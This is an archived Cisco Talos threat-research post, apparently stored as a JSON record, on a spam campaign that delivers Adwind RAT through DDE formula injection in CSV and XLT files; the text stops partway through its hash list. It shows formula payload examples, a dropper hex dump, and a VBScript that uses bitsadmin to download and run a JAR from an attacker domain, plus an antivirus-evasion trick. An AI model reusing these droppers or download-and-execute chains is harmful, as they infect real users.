{
	"id": "ecd3f23f-28f8-4d94-87a0-9ed12ef79ecb",
	"created_at": "2026-04-06T01:29:46.017888Z",
	"updated_at": "2026-04-10T03:22:14.119571Z",
	"deleted_at": null,
	"sha1_hash": "c36c5990653038b1d9797c26143c62059c2c6bd9",
	"title": "Adwind Dodges AV via DDE",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 463589,
	"plain_text": "Adwind Dodges AV via DDE\r\nBy Paul Rascagneres\r\nPublished: 2018-09-24 · Archived: 2026-04-06 00:06:12 UTC\r\nThis blog post is authored byPaul Rascagneres, Vitor Ventura and with the contribution of Tomislav Pericin and\r\nRobert Perica from ReversingLabs.\r\nIntroduction\r\nCisco Talos, along with fellow cybersecurity firm ReversingLabs, recently\r\ndiscovered a new spam campaign that is spreading the Adwind 3.0 remote access\r\ntool (RAT), targeting the three major desktop operating systems (Linux, Windows\r\nand Mac OSX). This new campaign, first discovered by ReversingLabs on Sept. 10,\r\nappears to be a variant of the Dynamic Data Exchange (DDE) code injection\r\nattack on Microsoft Excel that has appeared in the wild in the past. This time, the\r\nvariant is able to avoid detection by malware-blocking software. ReversingLabs\r\nhas written their own blog on this issue here.\r\nThe majority of the targets in this campaign are in Turkey, according to data from the Cisco Umbrella cloud\r\nsecurity platform. After our research, we have discovered important details about this attack, as well as the\r\nmalicious, forged Microsoft Office documents that the attackers are using.\r\nSpam campaign\r\nOur Umbrella telemetry shows that this campaign started on Aug. 26, 2018,\r\npeaking on Aug. 28.\r\nDNS query hits\r\nUmbrella also shows that 75 percent of the requests were made from Turkey. This is no surprise, considering the\r\nlanguage in the spam emails is Turkish. Some of the targets were also located in Germany, which makes sense\r\ngiven that there is a significant Turkish community in Germany. The attackers tempt the user with an email about\r\nthe cost of footwear in this particular example below.\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 1 of 13\n\nSample of spam email\r\nIn the screenshot above, we can see a CSV file is attached. We identified attachments with the .XLT extension, too\r\n— please see the \"Microsoft Office Dropper\" section for additional details.\r\nMicrosoft Office Dropper\r\nWe have seen at least two different droppers in this campaign. They use either the\r\n.csv or .xlt extensions, which are opened by default by Microsoft Excel. Both\r\nversions were leveraging a new variant to the DDE code injection attack. Although\r\nthis method is well-known, this variant is undetected at the time of this writing.\r\nThe dropper implementing this method will have the following internal format:\r\n\u003crandom quantity of data\u003e\u003cspecial byte\u003e\u003ccode to be executed\u003e\u003crandom quantity of data\u003e\r\nHere is a breakdown of what this format means:\r\n\u003crandom quantity of data\u003e — Random data in any quantity — the last is optional. Not necessarily ASCII\r\ncharacters.\r\n\u003cspecial byte\u003e — 0x0A (New Line) or 0x0D (Carriage Return), these special bytes are interpreted by Excel as\r\nnew lines, putting any data that follows on the first cell of the next row.\r\n\u003ccode to be executed\u003e — the executed command must start by \"=\", \"+\", \"-\" or be included in a function (such as\r\n@SUM()). The command format is command|'argument'!cell. The cell does not need to be a valid one. For\r\nexample:\r\n=calc|' '!A0\r\n+msiexec|' /q /i C:\\Users\\user\\Downloads\\file.msi'!A0\r\n@SUM(calc|' '!A0)\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 2 of 13\n\nThe dropper file can have any of the extensions in the table below. Not all of the extensions will be opened by\r\nMicrosoft Excel by default. However, for the non-default extensions, a script starting Excel with a file with one of\r\nthese extensions as a parameter is still a viable attack scenario.\r\nFormats like CSV doesn't have a predefined header, thus it can contain any kind of data at the beginning. Having\r\nrandom data like in the samples we found my trick the anti-virus into skip the file scanning. Other formats may be\r\nconsidered corrupted, as they might not follow the expected format.\r\nHere is an example:\r\n00000830 47 fc c9 c8 5f 27 5b 6e 4e e2 d6 88 21 24 cc 27 |G..._'[nN...!$.'|\r\n00000840 88 7e 5e bf 40 c2 e9 cd 8a f2 9f 2c b7 d9 b5 a8 |.~^.@......,....|\r\n00000850 2a c6 98 0d 0a 3d 63 6d 64 7c 27 20 2f 63 20 40 |*....=cmd|' /c @|\r\n00000860 65 63 68 6f 20 53 65 74 20 57 58 57 59 4b 4e 52 |echo Set WXWYKNR|\r\n00000870 47 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 |G = CreateObject|\r\n00000880 28 22 57 73 63 72 69 70 74 2e 53 68 65 6c 6c 22 |(\"Wscript.Shell\"|\r\n00000890 29 20 3e 20 4e 4d 55 57 59 54 47 4f 2e 76 62 73 |) \u003e NMUWYTGO.vbs|\r\n000008a0 20 26 20 40 65 63 68 6f 20 57 58 57 59 4b 4e 52 | \u0026 @echo WXWYKNR|\r\n000008b0 47 2e 52 75 6e 20 22 63 6d 64 20 2f 63 20 62 69 |G.Run \"cmd /c bi|\r\n000008c0 74 73 61 64 6d 69 6e 20 2f 74 72 61 6e 73 66 65 |tsadmin /transfe|\r\n000008d0 72 20 38 20 2f 64 6f 77 6e 6c 6f 61 64 20 68 74 |r 8 /download ht|\r\n000008e0 74 70 3a 2f 2f 65 72 61 79 69 6e 73 61 61 74 2e |tp://erayinsaat.|\r\n000008f0 6c 69 76 65 20 25 74 65 6d 70 25 5c 4e 4d 55 57 |live %temp%\\NMUW|\r\n00000900 59 54 47 4f 2e 6a 61 72 26 25 74 65 6d 70 25 5c |YTGO.jar\u0026%temp%\\|\r\n00000910 4e 4d 55 57 59 54 47 4f 2e 6a 61 72 22 2c 30 2c |NMUWYTGO.jar\",0,|\r\n00000920 54 72 75 65 20 3e 3e 20 4e 4d 55 57 59 54 47 4f |True \u003e\u003e NMUWYTGO|\r\n00000930 2e 76 62 73 26 20 4e 4d 55 57 59 54 47 4f 2e 76 |.vbs\u0026 NMUWYTGO.v|\r\n00000940 62 73 27 21 41 30 0d 0a 6e e3 b0 c6 a3 40 b4 fb |bs'!A0..n....@..|\r\nExample of a dropper\r\nExcel will display warnings to the user regarding the execution of code. Here is an example where the payload is\r\nexecuting \"calc.exe:\"\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 3 of 13\n\nExcel corruption warning upon execution\r\nAs you can see, Excel detects that the opened file is not a real XLT document. It explains that the file is probably\r\ncorrupted and asks the user if they are sure they want to open it.\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 4 of 13\n\nCommand execution warning\r\nThe second warning notifies the user that the document will execute the application \"CMD.exe.\"\r\nCalc execution\r\nIf the user accepts the three warnings, the system will open the calculator application.\r\nIn this campaign, the purpose of the injected code was to create and execute a VBScript with the following\r\ncontent:\r\nSet WXWYKNRG = CreateObject(\"Wscript.Shell\")\r\nWXWYKNRG.Run \"cmd /c bitsadmin /transfer 8 /download hxxp://erayinsaat[.]live %temp%\\NMUWYTGO.jar\u0026%temp%\\NMUWYTG\r\nThe script uses bitasdmin, a tool provided by Microsoft to download or upload jobs and monitor their progress, to\r\nget the final payload. This payload is a Java archive file.\r\nJava Payload\r\nThe Java code is packed with the demo version of a commercial packer named\r\n\"Allatori Obfuscator version 4.7.\"\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 5 of 13\n\nPacker banner\r\nWe identified the packed malware as Adwind RAT v3.0.\r\nAdwind configuration\r\nIt's a well-known multiplatform RAT with several configurations possible. The samples we tested were configured\r\nto achieve persistence on Windows, Linux and Mac OSX. Each platform has its own persistence name (see IOC\r\nsection).\r\nThis RAT is used by several malicious groups. It gives its operators the ability to execute any kind of commands\r\non its victims, log keystroke, take screenshots, take pictures or transfer files. In the past, it has been used to run\r\ncryptocurrency mining campaigns and in a separate attack that targeted the aviation industry.\r\nConclusion\r\nThe DDE variant used by the droppers in this campaign is a good example of how\r\nsignature-based antivirus software can be tricked. It is also a warning sign\r\nregarding file extension-scanning configurations. This kind of injection has been\r\nknown for years, however, this actor found a way to modify it in order to have an\r\nextremely low detection ratio. The malicious actor used a well-known\r\nmultiplatform RAT with a wide range of capabilities — a \"field proven\" RAT that\r\nensured it would work as designed and go undetected. Although both the generic\r\nmethod and the payload are known, this campaign shows how some variance in\r\nwell-known artifacts can trick antivirus software. Their behavior, however, is\r\nclearly classical, which means that sandboxing- and behavior-based solutions\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 6 of 13\n\naligned with intent-based networks should be able to detect and stop these threats\r\nwithout problems.\r\nCoverage\r\nAdditional ways our customers can detect and block this threat are listed below.\r\n(AMP) is ideally suited to prevent the execution of the malware used by these threat actors.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW),Next-Generation Intrusion Prevention\r\nSystem (NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nURLshxxp://avrasyagrup[.]live\r\nhxxp://avrasyayapi[.]live\r\nhxxp://birlikholding[.]live\r\nhxxp://erayinsaat[.]live\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 7 of 13\n\nhxxp://qakeyewoha[.]club\r\nhxxp://yeyamohofe[.]club\r\nHashes\r\nOffice Documents 0143b64f11346fab531951f7f1167a80e26728e6178676aacc9a58eca4b306d8\r\n05a3da412fb18736b93651a19cd87c2042db9dfdf8ad4e2a66239a7ec62a91ca\r\n05fff8c2a4c5090435420021d96992257433ac1bf247f6cebce9a64cf10f465f\r\n09c9ee0988af18b8df6123e439133df1356a88a7f0d890cb3b3e2414a427f4dd\r\n09cb501db2c5a8e7bbd8fd9a65f52363ebdb581bd7d5cbc77a732fd9f8bb5b59\r\n0a1ad19b950b8435e96be70d1bfb16b3bec4e9113c39299c8a89ddfd45ae24ab\r\n0a9dee3c14a4ec7acdde5283c44fc1d5fa163a9a9fc5cce40f011e5a2cce5403\r\n0b9605c9a49b1db8b703782162223fa8a09e864a92083e7427af89279db0520a\r\n0d96e9cbffb39b95cc3aec5a75e512564efa10a16cb0283119b1a997a2a63469\r\n0dec9c40241077c5c06474177dee7fef5931c7faa33d89f8d339fa2f6e7304b4\r\n0def2421327c971ae63075c533cf996951db4b5da72a2bc04bc0d304b4cbb510\r\n0f46d262b2968aa45f7fe0e5363c4519927e3bd912d9efbad94b1d7fdb45d929\r\n0fc020ab20b3e77dd13c53d89d75db8257573e0eedf6833497dc05e68e3718ae\r\n106e8963f23ab2fc04adc04cffc6a3b59e36fffa91d69d1553c2a3bcf95fe828\r\n13066b6f547d9dfa11046320a16c73964fba0b193ba25740fcb75a5d7df26512\r\n1397cf6ddcb2b30b3a5d6a003bd6aec1661854a81a745279f1f4259a5e337578\r\n13ab4c7c4c3ab91121cf599be375cea7f5e13994f7f01bd2b822442e7c71c07d\r\n13ee53b315c3a14febd7b55e14e52f42d60ef5f3f1e6f5baefc3ea8ad63d048a\r\n1460ddc9b732346052c29436e0c1390e59921dd68699beaa188d60aef59aec5b\r\n14aad5aa7a17b56772f4a3ef5139c0ab59e318032d914f4012b8f679475b9d5f\r\n15bfd41a85216cad6d21e84bccaef9218ceb76adf999797fc3a4b1ef1f9b235f\r\n16208cc35721ddf420e68e56d08d962182863eb9037ebef0fe1948818dfa3b57\r\n16d965ec99d4209702f11ae18de40a570600b650619a5f30d0a9d251417109db\r\n17ca6c33201bab32a20dbc86b0147c9bf216ce7da35f6dc04c48b2c75f57b741\r\n18a4061dd4b8fac9da260efa6a2d0922c1cfa4c5db6df5aa49206b19578a5d1f\r\n18f99644657252f4f815456968f696878ada0aa50bf181fa374218a29e1eb36f\r\n1b2c64a970a11dc02404b2c284e57ea2ce1802762e428ebcc4372596de9f5d02\r\n1ce2aba502a9a849c8955f39900ba6a0a9e7c8cfcf8b9bad31d49cc135bbf937\r\n1e32a63997a891960abdc273b660cfebb0fa499c72df04aeb4f3bfc54e6078fa\r\n2031104e107f9a1f6e261399c8eadcfbb825e526d5016877f62579674e75c688\r\n20d28e0d90dea1f655583c9842b2a1b35648bfb3dc29977de5961c69123d79e8\r\n21bcbea2d8d3a66bfc147a9b0dbe4fd5526d6cf21dda7280834526fd92e9c59e\r\n21e879984ee24c2a85981b88c1a7382de34133a196921afccc9957c0ed8a4962\r\n22752c9e6250ffafd923dbe08cac0001e1768cfb49fefb670812b682739ac4a7\r\n237a6496eb87a4cdebc14398f3813cd9e556f4a448dce889226440e160163174\r\n2472e142a95cded0360e381a653e8fd24e5e4135689601310b465934c83865d0\r\n25371c9bec5eb264953e4cf72639a29875fa2699d878a5cd74df778e0576284a\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 8 of 13\n\n25ef4d43ea422b0908065bcb6e9cb07bc2e1fd33c782c39adf7d609fe93e54dc\r\n261b3573a561147637f4d1781b0ecdb36473a8c51d23891bac9b3d54faf7cee0\r\n27844a470eca99a337fc0862dd7ef06e7c3332103be3826865255a309e4b71a4\r\n27afd89dd1a1c1fc728afa59365eebeb5967e67fd736cccf11b7be8799596748\r\n2822be3031a0215a725174b826b5a23bfcca740b997d1848eb8e3341dd940c23\r\n28efe349fb712ea0f3fd326585eed40f13919bc845296dc2e691e4c4bba1492a\r\n2c2f77190f9a36fbe2ec37bf67a27cf2b39ae2dbb17f0c627798f9f4f9cf39a2\r\n2d65475b0611cc191b1e21ceaadf85d9f63459796a97bd50049f2abc6938e193\r\n2e3e87d3d4b7f18f938d8a61d999eef5eedf9c3de57db4bf72ab94822103c0c0\r\n2f3b65ee0a39b8687357a41d81344f8acfd4ea5e63ef642f93df0df2d76b8d5f\r\n300d0ec247202760c1aef939a86a53c069bc81521883b57d26c2e58bf491274b\r\n3066c614b5bdda56872c8c0c4625d1c95980345cfb2f5b381623f88c420564d5\r\n30fa53738d410b32d0cc79da361cd7361a9cdf2954f2207e6869f15859fd41ae\r\n311b1c982340093ef34d58d5d1d898c6fa0ae69594cdcecad0c481c00e5020a9\r\n34595c987791c6cf49fcd792a1772164085190283cad7cb71c0a0593457b4d9f\r\n35876c75bdfef547cce630d55c14d38063dbdd4f51b361f73a5772ebc29e0de7\r\n3691cb207ba73679733d90a97e3b4e93e3fb807f751047b22d0dcc712160af4d\r\n3777b00d2cdc70f84995391dfc5d9b6c51257c85a358d12bce2ebc5d04f2a485\r\n382dcc0e67736d1731ca6cce46d7454d3f6c12a3c8fe52d836e1ff96a4067731\r\n383b0a3a1d33f1256a7d3ab581ff63533619481a07a5efa0f685aadb8e1a79bc\r\n38e309519e2c06f7bb72692dcd186ed2a03bb217eafa7c07a75f649dd472a10f\r\n3b5cc95e3ce3c4102e77e80fc45db8895d59b5838fa4a9f9a3a5020901006442\r\n3d84d60e432d20a1f716b6ed0a63aee69333715da1adcd90b22fac1e8029a536\r\n3e3eac9d620c96fb5aa646d5dc185d3c0a0f02ef9c582db0ade88a4fa6f0a0cf\r\n3f2a3d75fd5a89071e82593cb9c163d7c7886be287fcfa932cd9951cdb16c362\r\n3fca35af91052c235ab6d6e7f7ace47e0f3eacbf281eac3f66769b4cf4e68912\r\n40f6642559192806e49d56cdec05f4ac00ecc00a0dda659e8e86b0af2a5fcce4\r\n4169e137cf492ced4d2d97e9d89f92cdd0a6868947df10e0c8eba55ae8b0ee59\r\n41b750190dfaa6a01b8d8e6849f7deb348e7896951d646ccb3dd523aedb0cecc\r\n42589da889f67b7ad0e140b71891ab3140074403b6b2309d5ef521532f164baf\r\n427afa473950e7459f544bc8d4bdc054a1b994a9c18eb665a3e31068e783709a\r\n43e3d3ad32bd560046e3f34892aae3e3bad471d4183babf7f4eba3437bee5a2d\r\n447905036af51ceb2b2326ad2f8f734591716f3468b5f2ece2c05e8ec054e21c\r\n4577d8abd4248d56a1e2d48335b309ec1784f292899443c2f24b7163f4d3ce9e\r\n474257fbcadbf64f2cc788949536dc659a5b4ef733d2e216bfcdcb757588e78b\r\n4836bdae84c1b892a6278f5a6fb3058a58b3b87846e70645b3cc4966ccec02c9\r\n49913d699a53bc06d5f1f1a4bd253a34e43edf1ef91744994387a2da6851341e\r\n4a6fb60e8e996e819e33e4c44424856bc9ec6da03770f359211010b16f1f8d50\r\n4b2c0f1fabbfe7f30767f043e5550003ccd49e4fea27da0854d8d9a514516b12\r\n4b9a8158f5c7a291d75a2413d5b5b7354a13d9abd40c46d364a4b352c564a03a\r\n4c16bbbe65e57bb396272fa76100a87a85ea0f45481e576cf4eddf4baafe81af\r\n4d7ea169611836f235e87b3a211ba19eb5f8f793b46921cebde76b3c41322ee6\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 9 of 13\n\n4e3cc55723a813b905e48ff2617f3b55060c9952745f52d1550731796ff0fa93\r\n5069841e9d9712aa35024cdd5e7597b8214ea96213d0a5d6da701b79a3351dc7\r\n5163c822d9cdd5677551d1c5322693b4c4a42e72a8a0819e288d62f1c402d525\r\n52023b34082432a9eb37b725282facb4716ecc4577070cd51be041691a0241e8\r\n52107734ea75c05f99bafa000e6f0e93ddde9323d1434f903a49b74e9569b187\r\n521eac04f330925038ad5d3236f4ad35747720f4f1192be929d80b6f9251278f\r\n5591a3df4fc3bbb32aa33768678f78ab36fd53c06f7d860dd46611d1aed8ea4f\r\n56c03dfeb50f5deaa6c50d075fb81d61717018eafea471cc5508eee578e69280\r\n56c22da60079e60d2dbcf4bc70edf585127c7d4549ac988c6e6d3d8c1f4429d0\r\n573e6febfdd3e8112d467d723cd246f79229437623921a681601e15f96cc5eaa\r\n5940e41250e86ce2fdd36f1383d00a4beadd10c4eedf04b07e08be57ec0da763\r\n59939de1a30a09a8ab38456b23266835a152a8bc0ae82dc79b81de4f26e91405\r\n59b9a8dc5e78b38a21c18e46af17462364210e6fe37e1ffc15428719ce8da899\r\n59e72fd77130a2a0544c5c423e9545e6b849acbb8dd3b1a720f963736822629d\r\n5a2c1f55178421ae66246e5a9dd02f7c0ce8fc0082e07131a477985e59c0b091\r\n5a5f3d1eb98268ab28d90290c311e85b8078dd8a5e2d4af3d97bac72cdbaf608\r\n5ae6438e876b6479672996fa7a1f83bc86d87c219de9e35f042661ff9a3316b7\r\n5d79e1c5bcb72748e512369d5f3059cfe0b3ea854868ec0fa2af782b4fb3dc0d\r\n5f68af453c470804a873b91043ed5aa98a0196b8bc36ea1b06375814412423bc\r\n6073fbefc440bc037c01bf361b6dc15801253339a3c40cf320dc7db1d3e1fab7\r\n65bae7412363a2d2d595f8c84cd2a74f308fe782d99d28809ae779aef68115e2\r\n65e9385ebb2ee02f5598bac5ea60781ef52bde5f24edcaf3dec87e5bd8e276c9\r\n6649e13fe463b984d53ed1d88b7b3a5a71afe4ab345e6414f8ac331b1920f71a\r\n67c479955311aa7adcfbe91b66b90b6a6d145dde0613a2dd72159db0b811e9d6\r\n68de8691070ac38db2961eaf4e72296279ef2f21959a0a84c600e08e06c9cc82\r\n6a4f25f68dee6eaf7d745b364dfcdd28036949200b26685722f5e757b84d8947\r\n6e10ec07bc40ee89e438f9a3a5b5161b36fa00b39321c704f22a62fcda6253aa\r\n6e44d7e246766f2c9b41ff61630e8bc43e8f4223ddfd867b22798d24ca8a1bb1\r\n71da26a65efd35422c0db45682daf285c5eb67a4214ab6159fa963e242852546\r\n72d39c33569f3f5a8e48f3bbc85d659128edadde45838ddcad1f5d68ae289a0c\r\n7590ce94e48fa7e61719aca6efe9cd11fb3e0bede9d7fcf87f6ed8d470215a5f\r\n75ae66563e078fb29026cb0325198c7b02475f397354d127057fa9bd1ce33d44\r\n769c0bef0870ee8417867384098982b28c8255f0fa6f0331d44e9c7b1c2eb7fd\r\n78ef4a2052410b85b197dcbccdf8531fb0acc0fd1d7a682d9c152d31502f8a3b\r\n79cbb38edc1ce1cff20207e00ec1071ccfd56de922d64a759a6b793d685f01c3\r\n7cbf55984d4a98f6711de655ff1c59708911a9c0220abfd4178b2d3ac28288c6\r\n7e94fab8610bcd5cb4ffde8afb01c04671576999082a7fa828caff79450c3a4b\r\n7ffb7714e0fca5497c3f1ac008721c2773ebca81a6fe6673f4642fbc2695b8f4\r\n8129156d2990dfc3a6146afcbe40c0a52da3af8705701387016810cc30220b05\r\n81c96b002bba3a5e1ba200fa655cd6d3d90ef5560d1a9ef98c156aa467221272\r\n84aeeea5704dc5e09881d446f34625ad1812e318c4e3a70288992cb07e6cd2d3\r\n84cdb095ab945aeef51418cd6fd45eb1812cbfb68333eeafb95408925811b8e6\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 10 of 13\n\n868142957bf06e150ba385d988f87e3c3630ad8ba2baf5c9c7d9fe50ea7a69e3\r\n86e61aafe93dcb9530cb58d00e69d209488073fd1d06dd92fd17f0c81dbe5d5b\r\n86fd640eaf182fee13c16e8858c8b058acb451af4b5fc14589ba1fd277d4b60b\r\n8a182b9f7b348d1964f9da9d6089f1296a3cd71f563c492eded0be65c9d6792c\r\n8a6452c8591d3f07ef6b01dd49304d2b9c7b063a489ab568dabf4ca7d90e3229\r\n8e9a290e9358a0e0662d79b00eed2658bc94b7d607159198bad787f612d51e49\r\n8efbe0889db86bcecc5ff43765683f2c00b65af9803e0cb282fadd58feb03776\r\n90f6ee05006a1d3837e16f3b243f0ee088596d1547f399b92ccc1017e1047957\r\n91baf2e005e010c91e3ae50d6c5430492d0f1c919548c8e335fe9514268e9fb4\r\n925398783d6f4e4dbe9f85161b88d308064127d665cf6f876e73c59e51f97a9a\r\n9261f9ebf099112ca4f29598a822aa1e490c851b1628c1dcdc023a90b257c202\r\n928d2722fbc0bfaa085f11dbaa8a748f7dbf0b0d5fc632b34a97f89e3006d2ec\r\n9473ce9fba30cf8d338f5517eae1f1b6629b0594810ef1d0b126e45ef624fbf4\r\n94b3811307fa1458a7701096e5b9820c264d0bb331ed4fce7a51ea47d7c2c450\r\n95c0cc0f7391b97437174d65321448bed99820985f12eeff0d47840f3df46a26\r\n9cc4ca0aa1b929878bff9d9fd03dcef0cad039e65ed7ede73424d8851ddc09e1\r\n9d8583048ee607ae4c6f6e0dff2f899b092bd1984570b2719e5345b91b830976\r\n9d8fd20239541656cf3713e221303897551b6f12f358d46ac638f6dff3cc1c86\r\n9e45c093cae1c9334962d1a7ce2f6e71042543712a3ea86c37074e532a926823\r\n9f8af28b654d32a26f1edeccf7da92a01fdcaf6e9c9c64a2795fe8111e65f53e\r\na2fb4cb9e9ac4f30b5f6d30de7c43901607498d760e34aec87700f27b3a246b4\r\na5ce37f3b0f797b251cdf32dbe25db779e0464673e3cff33e33c0fa7552b8543\r\na5faa8be836152acac6eb28ed45c042d793b5e0ecc54eb8a081af69510b46077\r\na5fac06abe7fc1d4b425042cf6cd4ee1d49032368d537aa09086413c980540b2\r\na6b1d4e677b5fc1757358937ab166611c88519ff8827ce8ed388993239e0ffe7\r\na6daddeec987620e07d6141579583e8b239a087d216fd4bd214cec963e27f6df\r\na78ad2d3a68d03f306a81eedd12668d101c3b329cc4c396f119b7b863a9a43cd\r\na79f13267769a8d2ab4b2122c5f1bc5d5972e13ec2ebad829f7305b60e6138c0\r\na940ca6b3193b7c1d52ce949e688cb6c5c00b330e01c95bb2422d7d79dba0155\r\na9c082d3e50c61bdbf97ad3b3f0077685a6821cbe65d80fe176aaa92d1401e53\r\naa8cbb00c9090a5d223bc7f51f5bc5ab55db17a62341e5335d1860ce68cea918\r\naa9dd7fc6f98833216c6c7f9a820d3eed39072280aed2760d71732bc66b7604f\r\nad878d73de2a4e14684473616fb8a09b3e7ec7c725ef7ac0ecb17e9f09367b39\r\nadf21761baf7dfa6d2beafe47fce02f61d6349e15e54c9366e9360d0f3f29e46\r\naf91ac41500194b202ebb353066906c7ca01cfef3b482d7deaf24d60e486687c\r\nb0cf3219729924e2edbea9d9008acac8f898c063e0b3dfbbb445a20b62000318\r\nb10153504352f007853ad9828139904aada6a884ebe13f8e5792223ad8f856e1\r\nb2a08ce7b2e724333c447650e7ebbeb207c690178574115e0b97cfe0d8b70e15\r\nb4d061e5c25f8dafedf3cb7f1a847ec7d15f7657edf2fe52929480a5831ce558\r\nb660d3af609a43f62ee09db6d4fd2ced17dfe6103ef6b7ef518ef054ec8b0600\r\nb66e51aaa6e9825374e299c79b717d078b00cfb4e62626c47a6d8c80e21ac52c\r\nb7190b6662966a5fd04c4b604b50139312d4c57fcfc5168d55f21c27e8973344\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 11 of 13\n\nb75a3a2d954119a673cfcd303dca027da418006d19cbe46464d90a908fa1490b\r\nb760c929a74461918567105db0b2a15991c20c241b599edbd2d0eef08a73d69f\r\nb8380a1541007fea7ed9aac2dbea21b3504f7bdafc032f95790df2f51a9bcbee\r\nba1cfc758e4569e3771a02d51c3d4ba7afec8b53db96242d2452342d7eeec875\r\nba3128b66e81f74fa160445d5bd4c42b7891cf9f7427ffd6e84d7afdcd5a3667\r\nba5aa059277b263866237d9dbb07d7ac8cd1d0d1366ee0f1f56e7d39ebf9a14a\r\nbb5989d1f78cdf6a3c06950d1a74bd0b41f34282c30d135e4cf47107210fe71b\r\nbb8e8ee7c848f7b483ce2e9b6a44bcf12a22d2f3a6c44577ff1b94eb835bb27a\r\nbbde3ab8e47481635f32406d6826a3969ecf87a1c9bce746d688b980db183063\r\nbde29046c392e9d7ba333a97dc83001fdd76445bbe090bcf07d10eda843ead74\r\nc00bccd91968a0e0dcdaddf5b3c46c0b84763b42c6b2cf190e4028df7f6a2d61\r\nc05a603e3b88399c67fab5fab3df27a7ebf39082c9189ebca7ef7ad5ad1c6cd6\r\nc1feb9bc7c59ca15a117f844452ec93ac0019d8d5fb35fd32b1264dfba75cde4\r\nc23777e5fc6d93ba8fce9f72400627e12a501d876db37abd2efdec6042177d5f\r\nc289d754bb9c04b45e9730b1f618e26b9162119ec25043cd27322ed6ebc34b86\r\nc6f13ad844d496642c6fc89a6bfdc2fd2067babe71085043307875b6cdcaef4e\r\nc71899e92dfbf4843511fddc1e15b2623957aefc8b67ba986fdc30176e6f7eb2\r\nc7bfe9228ad771a4134c23488f62d7561a8275a88479547d9f6b1e1a4687e999\r\nc868f5a185f650529a5097bd9ee04c2557ece354418b85ac79f32e315177bb3e\r\nc8c4148e7e2824d4bbe0fd54908fb4dd400503ff2c1a7c6faa7cf34613575ea6\r\nc938cdba2794c0c0899a99c6ceecb3bb9eb515bbc83c2248245d72bc7b15a111\r\nc9c61bca518170b3a4c894620a152dbe4902593639e007ac817d72a5b947a288\r\ncc32182b850b8f1297746ce3321ea5612a9143aa4870eae6388c5f6c618a1eb5\r\nce022e9556b4cf0bc90bebc4d2c6a11a2367965b10af0639c638a91649db56e9\r\nce54c4f74e7064d28a07970fc8c99723c2f9d2f68bf5aef787cf2e5fd644d088\r\nd1bd4ce6d4d3c38380b676201b6dc77b56ec209ad34247a223a4fe9616e72189\r\nd275dfed656a884b20558526463d8daa145c5d49f8b3619847ce98810dfd21a8\r\nd2a627bdaf8835211d5cd12b00bfe9d2f9ffab538946c0346e0a06c3524fd90d\r\nd3ebff1bbb4ceb04b901897db2b62962fb4cdf3ebef84ecc50e218c71c8178c6\r\nd4eb694450490c87dc688d228cb5f18bce25f1e2993882a1f1cc20464a61216f\r\nd53ae69f28940bfccf9ef0e900c9fad9948e0a57fcbec050ad361d1233dd67cc\r\nd797190dee156d67c101546e125ee7d86b05cd20e26fa2fce522048678201ea7\r\nd7ea65296e00a373462bf992e08217e961212a639f5dbbd74b96c29fe1b04a31\r\ndab4a1d3767be0bdfa2fb232cf4cdae80821b8b7b942fe7c98f7f6169a5a5abe\r\ndba0d1bdc062c5db3373aa31fbc7fc5a0dd9f6c2e3b46b1c671f8daab5ab8200\r\ndc7b5e7b3b8fd07ab00db297d122c8b326bb206610e685d7f95dabf87957cce6\r\nde39323998aed531a281f7166e9db6ebc85524a596ef2bfce3719dfdc0863eed\r\nde86474c0da9cb8093a8af97d20353c98d3665f2f84962e312ca3dd58edfdb1c\r\ne13f386beb95724a5b392e6870bc583bc10904467b29a6de8943ff29003bd460\r\ne2cc79e2348677a7a307497242a24216bec0c19f174e1de8f16f54fb64807a47\r\ne36283ab07e1528223983bcab815274a2c88997470c31daae5ed190171c8b7b1\r\ne50db1c8ceece1221efd8a7dc73fbb4a80dc980903f3f47d0673b813afcbcabc\r\nhttps://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html\r\nPage 12 of 